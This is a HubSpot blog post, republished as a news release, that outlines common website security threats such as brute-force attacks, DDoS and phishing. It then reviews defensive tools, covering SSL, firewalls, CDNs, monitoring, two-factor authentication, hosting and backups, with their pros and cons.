11/07/2024 | News release | Distributed by Public on 11/07/2024 06:27
Updated: November 07, 2024
Published: May 22, 2020
Like many people, I spend most of my day online. Whether for work, browsing, or making purchases, I trust that most sites have strong website security. The last thing I want to think about when visiting websites is whether or not my data is safe - and if I get the feeling it's not secure, I quickly lose trust in the business (and get far away from the site).
Security breaches come in all shapes and sizes, but they often spell financial trouble for targeted companies. IBM's Cost of Data Breach Report found that the average cost of a data breach in 2024 is nearly $5 million. Not only are these hacks costly but they can also significantly impact your brand image, authority, and trustworthiness. What's even more alarming is that it takes an average of 277 days to identify and contain a security breach.
As business activities transition online, it's clear that website owners shouldn't see security as an afterthought or optional luxury - it should be a priority. The good news is that there are many services available to help you secure your website. In this post, I'll share expert takeaways on the top threats and ways to prevent them. I'll also recommend various high-quality website security tools and outline key features to help you make your decision.
Table of Contents
Website security is any practice, action, or protocol to protect a website against cyberattacks and other security threats. There are many ways to secure a website from these threats, including Secure Sockets Layer (SSL) certificates for data encryption, web application firewalls (WAF) to block malicious traffic, and two-factor authentication (2FA) to secure credentials.
Any company with a website and customers must take website security seriously. Not only do these measures protect your company data, but they also help build trust with your customers, who expect their information to be kept safe when they visit your website.
Joe Warnimont, security and technical expert at HostingAdvice, explains website safety perfectly:
"A secure website protects three main elements: your brand, your customers, and your revenue," he says. "Website security ensures customers have no issue coming to your site as they know it's safe from cyberattacks and data breaches. A poorly secured website results in worse SEO results, lower customer trust, and downtime, cutting into your money-making potential."
Build a secure site with a free SSL certificate in HubSpot.
Pro tip: Want to check your website performance? Try HubSpot's free website grader to understand your current site security and overall performance.
Before choosing a website security service or optimizing your website for safety, it's important to know what exactly you need protection against. These are the most common website security threats you should know about.
Several IT experts I spoke with suggested third-party exposures are an underappreciated threat to website security. And they're a rising threat in the industry.
Data from Prevalent's Third-Party Risk Management Study found that 61% of companies experienced a third-party data breach or other security incidents in the past year.
These threats can take shape in the form of web scripts, for instance. The lack of governance in using third-party scripts leads to data leaks, according to Simon Wijckmans, CEO at c/side.
"Modern websites rely heavily on externally loaded third-party scripts for functionality like analytics, chatbots, and display ads," says Wijckmans. "But a vulnerability or compromise at any of these myriad third-party providers can lead to widespread data breaches and security incidents when scripts get hijacked."
Eldin Scotland, IT Manager at Customer.io, suggests one way to mitigate these exposures is to implement a thorough vetting process when onboarding vendors.
"One way to ensure you limit any risk with third-party exposure is conducting third-party vendor assessments during the vetting process of new tools in your ecosystem and continuous monitoring by incorporating risk management into your contracts," he says.
One of the most common types of cyber attacks is a brute-force attack. These attacks are when a bot or hacker uses a trial-and-error method to guess sensitive information, such as login credentials.
The 2024 Data Breach Investigations Report by Verizon found that 21% of web application attacks are brute-force.
Distributed denial-of-service (DDoS) attacks overwhelm a website or server with malicious traffic in an attempt to crash the online service and limit access for legitimate users. These attacks are typically done using botnets, a network of compromised computers or bots controlled by hackers.
Mitigating DDoS attacks involves identifying the difference between regular and malicious traffic, which can be tricky. IT experts typically recommend using a layered approach to mitigating these attacks. Implementing everything from rate limiting to web application firewalls can help minimize the chance of a DDoS attack.
Phishing attacks are when a scammer sends a fraudulent message, usually an email or text, with a link to a malicious website. These attacks can be used to plant malware, commit identity theft, and steal credentials.
As a company, the best way to prevent phishing is through continuous education. Employees must be encouraged to use 2FA, create strong passwords, and be able to identify suspicious messages and links.
"Avoiding phishing attacks requires continuous security training, demonstrating an awareness of spotting a potential phishing email, and reporting any suspicious emails so that security teams can further investigate," Scotland recommends.
Use HubSpot's checklist to ensure your website is meeting security standards.
Internet safety is incredibly important, especially on your website. I'll share a few tools you can use to inspire engagement and customer loyalty by creating a safe, secure site.
Secure Sockets Layer certificates (SSL) are small data files that create an encrypted, secure connection between a website host and an individual's browser. An SSL ensures that any data shared between the two parties is secure and private, protecting information from hackers.
Websites that use the SSL protocol have a domain that starts with https:// (instead of http://). Having this certificate on your website is essential, especially if users exchange sensitive information with you, like credit card numbers or secure file downloads. SSL shows visitors that you're taking steps to protect their information.
Google also prioritizes websites with https:// URLs in its search rankings, and the Google Chrome browser will notify browsers of its presence with the lock icon in a URL bar:
Google will immediately let users know if they have landed on a site that is not secure and recommend that they navigate to a different site, as shown below.
If you're hoping to use an SSL certificate for your site, they can usually be purchased from your hosting provider, if free SSL encryption is not provided. However, there are a number of external tools available to get certificates from, like Let's Encrypt.
Let's Encrypt is a free certificate authority, owned by the Internet Security Research Group (ISRG). Unlike other services on this list, Let's Encrypt doesn't have an extensive list of features; it simply issues SSL certificates to businesses for free. I like that anyone with a domain name can use Let's Encrypt to get a free, trusted certificate.
If you're weighing multiple SSL certificate providers and skeptical because Let's Encrypt is free, not to fear - it is trusted, sponsored, and funded by well-known businesses like Shopify, Cisco, and GitHub. Below, I've listed the pros and cons to help you make your decision.
Pros |
Cons |
Let's Encrypt is a free service. |
Only offers Domain Validated SSL Certificates, so larger businesses may need additional tools. |
Simple installation process with easy-to-follow documentation. |
The certificate must be renewed every 90 days. |
Google Chrome is a platinum supporter, proving its prioritization for website security. |
No customer support so you're required to self-manage. |
No downtime during setup, meaning that users will still be able to access and browse through your site as you implement SSL. |
Rate limits for the number of domains you can register. However, the limit stands at 100 so the issue is more relevant to larger businesses. |
WordPress.com hosting provider automatically enables Let's Encrypt. |
A web application firewall (WAF) analyzes your incoming site traffic for suspicious activity and blocks browsers based on a set of predefined rules. A WAF can protect against overall targeted attacks like DDoS, cross-site scripting, and structured query language (SQL) injections. There are hundreds of WAF tools available, and Cloudflare is a great option.
Cloudflare is a WAF service and cloud firewall that will filter incoming traffic and protect your site from malicious actors. It uses powerful machine learning tools to learn from hacks against the 25 million sites it protects, so the scanning process is automated and doesn't require any additional input from you.
However, if you notice that there are repeat, specific attacks against your site, you can define your own set of rules and block specific IP addresses (shown below).
I personally like Cloudflare's Under Attack mode, which gives users with compromised sites immediate access to additional protections.
In terms of pricing, costs range from free to $200 for business accounts, and Enterprise costs on a case-by-case basis. If you're using HubSpot's CMS, there is a free WAF that provides end-to-end security for your site.
Pros |
Cons |
Easy onboarding process with simple set-up and documentation. |
Only available to a single user account for your business. |
Build on a global network that learns from threats to ensure better security standards. |
Some users report difficult configurations with Amazon Web Services. |
Analytics and reporting dashboards to see overviews of blocked threats, which is not a common feature of WAF services. |
Free version takes 24 hours to propagate, only conducts scans once per week, and users report difficulty integrating with external SSL. |
A content delivery network (CDN) is a system of connected servers that make your site accessible and quick to load for users across the globe. From a security standpoint, a global CDN on your site is important because it ensures that your central servers aren't overwhelmed by traffic. Overloaded servers can, in turn, make your site more vulnerable to spam attacks.
I think of it like this: If you're a site owner who uses a server based in Florida, that same server will need to accommodate browsers in Washington, D.C., Paris, and Singapore. That server won't be able to manage an influx of traffic from all over the world, but a global CDN can do so through a globally distributed network of servers. Instead of slower load speeds, a global CDN improves page performance for all browsers, regardless of location.
Build a secure site with a free SSL certificate in HubSpot.
If you're already using a hosting provider, they probably handle CDN or offer a CDN bundle, so you won't need to do additional research. If not, Cloud CDN by Google is a viable third-party solution.
Cloud CDN is a fast, reliable service that quickly and securely delivers your site content to users across the globe. It does so through a globally recognized anycast IP that cuts down on site load speed and optimizes last-mile performance, so all your site content is available, not just the first loaded elements of your site. The anycast IP process is displayed in the image below.
Cloud CDN also recognizes popular open source languages JavaScript, jQuery, Dojo, and SPF. Cost-wise, users are charged per server request so end-totals will vary by user - refer to the pricing structure here.
Pros |
Cons |
Managed SSL certificates at no extra cost, but you can also bring your own. |
Requires technical understanding, but the in-depth guides can assist first-time learners. |
Terraform support. |
Pricing structure may be difficult for small businesses to manage. |
Real-time site metric alerts via email, Slack, or your preferred service. |
Some users report long wait times for customer support issues. |
Fully-managed CDN, requiring no additional work on your part. |
DreamShield is a malware removal service offered by DreamHost. It works by scanning your website weekly to detect and remove any malicious code.
This service ensures your site remains secure by identifying potential threats early and preventing damage or data breaches. DreamShield is suitable for all types of websites, from personal blogs to business sites, and doesn't require any technical skills to use. In my opinion, it's a straightforward way to maintain the security of your online presence.
Pros |
Cons |
DreamShield runs automated weekly malware scans, ensuring regular site security checks. |
Scans are weekly, which may miss rapidly emerging threats. |
It detects and removes malicious code, providing comprehensive protection. |
Limited customization options for advanced users. |
The service is user-friendly, and no technical skills are required to operate it. |
Only available to DreamHost customers, limiting its use to this hosting provider. |
DreamShield sends alerts if threats are detected, keeping you informed. |
I think one of the simplest ways to ensure security on your website is to use a website monitoring service (WMS). These tools monitor site performance, like page outages, as well as vulnerabilities that threaten site security. Essentially, a WMS proactively identifies issues so you can address them before they get out of control.
In my experience, LogicMonitor is a well-rated WMS tool. It is a hybrid SaaS, meaning that it lives and operates in the cloud and as a lightweight tool within your site networks. As its name suggests, the service monitors your site and creates analytics dashboards (shown below) that explain site performance and notify you of present or incoming threats.
LogicMonitor is highly rated by G2 and Gartner. The service is priced by volume.
Pros |
Cons |
More than 2000 available integrations to customize your system and collect the data you need to run your site. |
Customers have reported a longer, involved set-up process. |
Guided set-up process and interactive data presentations to understand site performance. |
Pricing can be a little confusing with multiple coverage options and add-ons. |
Phone, SMS, email, or Slack alerts for high-priority issues. |
Requires a web connection to access, so any pressing issues might require you to stop what you're doing and find internet access. |
Multi-site monitoring. |
Two-factor authentication (2FA) is a simple security solution to protect against targeted attacks like brute-force login. While other tools on this list focus on site safety, 2FA ensures that those who can access your site security tools, like administrators, are the only ones to do so.
2FA protects secure files and sensitive data by using two sources to confirm the identity of users logging in to your site, like a chosen passcode along with a push notification to a personal device.
Duo Security is a two-factor authentication service that ensures secure access for any administrator or user on your site. It uses multi-factor authentication, remote access with secure VPNs, and adaptive access policies to grant and deny access based on user roles.
I personally like that you can use Duo Security to ensure that any administrator or user with editing capability on your site is who they say they are at login, not a malicious hacker or spammy bot.
Pricing options range from free to $9 per user, per month.
Let's go over some pros and cons of Duo Security, as reported by customers.
Pros |
Cons |
Remote access, ensuring that users working remotely are securely and safely accessing your site. |
Tedious, involved set-up and authentication process for new users. |
Ability to define security measures and restrict access based on custom standards, like user, device, or location. |
Single-sign on (SSO) products require on-premises servers, so tools for offline or remote work may require additional purchases. |
Hosting is the backbone to your website, as it's how you can have a live site in the first place. Without it, your site wouldn't exist.
I think SiteGround is a great choice when looking for a web hosting provider with a security-first approach. The SiteGround platform is built with security and speed in mind and has all the security features your site needs: free SSL pre-installed by default, smart in-built WAF on all servers, geo-distributed daily backups on all plans, 24/7 server monitoring, AI-powered anti-bot system, managed PHP, comprehensive monthly security reports, WordPress-specific security tools and plugins, and many more.
Additionally, SiteGround users can add the company's SiteScanner - a tool for scanning files, domains, and URLs to prevent the upload and use of malicious files and ensure your website is well-protected.
All WordPress sites hosted at SiteGround can take advantage of additional WordPress-specific security features like:
Pros |
Cons |
Premium security and speed features included for free with all plans. |
On-demand backups available only on the highest plans. |
Daily geo-distributed backups included even in the smallest plan. |
|
Knowledgeable and friendly 24/7 support. |
24/7 support is only available in English, Spanish, and German. |
Easy-to-use site management with the in-house built Site Tools control panel. |
Another critical element to your site is having backups of your site files should any hacks occur or if you plan to switch hosting providers. Backing up your site is a way to ensure that your files remain secure and available when necessary. While it's possible to back up your files manually or possibly through your host, I suggest using Dropmysite to automate the process.
Dropmysite is a reliable backup and recovery tool that uses SFTP, FTP, or RSYNC credentials to securely backup and store your site files into a cloud database. The process is fully automated and features a one-click restore option for files and site content that has been compromised or accidentally deleted.
You can elect to back up all elements of your site or select specific site files and folders that you deem most critical. Most importantly, all site file backups are stored securely on Amazon Web Services using Server Side Encryption.
Pricing depends on the amount of storage you use and can range from $29.99 for 10GB sites to $1299.99 for 1000GB sites.
Below, I've listed the pros and cons of Dropmysite, as reported by current users.
Pros |
Cons |
Easy to follow set-up process. |
Backups aren't incremental or based on file changes so all site files are re-downloaded each time. |
Automated back-up, requiring no additional user input. |
No additional features or add-ons, but a full-service host can likely make up for any additional needs. |
Pricing by storage size so small businesses aren't paying for more than they need. |
What I've learned from the IT experts I talked to is that website security should be an ongoing priority if you have a website. Cybersecurity threats remain prevalent and will continue to evolve as technology does. In addition to ongoing training, software updates, and monitoring, it's worth investing in website security tools.
Fortunately, there are a significant number of tools available to website owners hoping to prioritize site security. You can either choose to use multiple tools or opt to use a full-service host that will do most of the work for you.
Regardless of the route you choose to take, you should choose a service that aligns with your pricing needs, provides the necessary features, and, most of all, creates a secure experience for your company and your users.
Editor's note: This post was originally published in May 2020 and has been updated for comprehensiveness.
Build a secure site with a free SSL certificate in HubSpot.